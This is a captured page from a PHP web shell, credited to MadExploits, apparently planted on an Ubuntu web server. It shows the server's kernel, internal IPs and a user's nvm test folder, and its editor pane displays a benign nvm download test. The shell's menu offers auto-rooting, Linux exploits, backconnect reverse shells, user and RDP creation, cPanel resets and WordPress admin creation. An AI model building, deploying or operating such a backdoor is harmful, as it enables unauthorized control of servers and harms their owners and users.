Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
ayush23027 /
.nvm /
test /
install_script /
[ HOME SHELL ]
Name
Size
Permission
Action
install_nvm_from_git
4.03
KB
-rwxr-xr-x
nvm_check_global_modules
1.94
KB
-rwxr-xr-x
nvm_detect_profile
3.94
KB
-rwxr-xr-x
nvm_do_install
645
B
-rwxr-xr-x
nvm_download
527
B
-rw-r--r--
nvm_install_dir
677
B
-rwxr-xr-x
nvm_install_with_aliased_dot
454
B
-rwxr-xr-x
nvm_install_with_node_version
303
B
-rwxr-xr-x
nvm_profile_is_bash_or_zsh
817
B
-rwxr-xr-x
nvm_reset
1.34
KB
-rwxr-xr-x
nvm_source
3.04
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : nvm_download
#!/bin/sh cleanup () { unset -f die cleanup } die () { echo "$@" ; cleanup ; exit 1; } NVM_ENV=testing \. ../../install.sh # nvm_download install.sh nvm_download "https://raw.githubusercontent.com/nvm-sh/nvm/HEAD/install.sh" >/dev/null || die "nvm_download unable to download install.sh" # nvm_download should fail to download wrong_install.sh if nvm_download "https://raw.githubusercontent.com/nvm-sh/nvm/HEAD/wrong_install.sh" &>/dev/null; then die "nvm_download should fail to download no existing file" fi cleanup
Close